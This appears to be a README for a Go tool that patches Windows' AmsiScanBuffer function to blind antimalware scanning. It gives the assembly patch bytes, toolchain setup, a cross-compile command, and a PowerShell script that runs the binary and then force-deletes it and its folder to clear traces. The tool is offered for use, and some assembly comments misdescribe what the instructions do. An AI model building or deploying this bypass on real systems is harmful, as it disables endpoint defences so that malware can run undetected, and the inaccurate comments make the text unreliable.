Overview
This repo contains a Golang implementation of a custom AmsiScanBuffer patch. I used this site to assemble the code: https://defuse.ca/online-x86-assembler.htm#disassembly.
My implementation
- xor eax, eax ; Clear the EAX register by XORing it with itself
- shl eax, 16 ; Shift the contents of EAX left by 16 bits, effectively clearing the lower 16 bits
- or ax, 0x57 ; Set the lower 16 bits of EAX using a bitwise OR operation with the value 0x57
- ret ; Return from the current subroutine
Setup
Install Golang
wget https://go.dev/dl/go1.22.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xvf go1.22.0.linux-amd64.tar.gz
sudo nano ~/.profile
export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Set up the Go environment
go env -w GO111MODULE=auto
From within the source directory
go mod init main
go mod tidy
Install the MinGW cross-compiler on a Debian-based machine
sudo apt install gcc-mingw-w64-x86-64
How to compile
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o test.exe am_s.go
Create a tarball containing the executable
tar -czvf test.tar.gz test.exe
Execute the binary
$tarGzFile = "C:\Users\user\Desktop\test.tar.gz"
$destinationFolder = "C:\Users\user\Desktop\test_extraction"
if (-not (Test-Path -Path $destinationFolder)) {
    New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
tar -xzf $tarGzFile -C $destinationFolder
Set-Location -Path $destinationFolder
$binaryFile = Get-ChildItem -Path $destinationFolder -File | Where-Object { $_.Extension -eq ".exe" } | Select-Object -First 1
if ($binaryFile) {
    & $binaryFile.FullName
    Remove-Item -Path $binaryFile.FullName -Force
    cd ..
    Remove-Item -Path $destinationFolder -Recurse -Force
}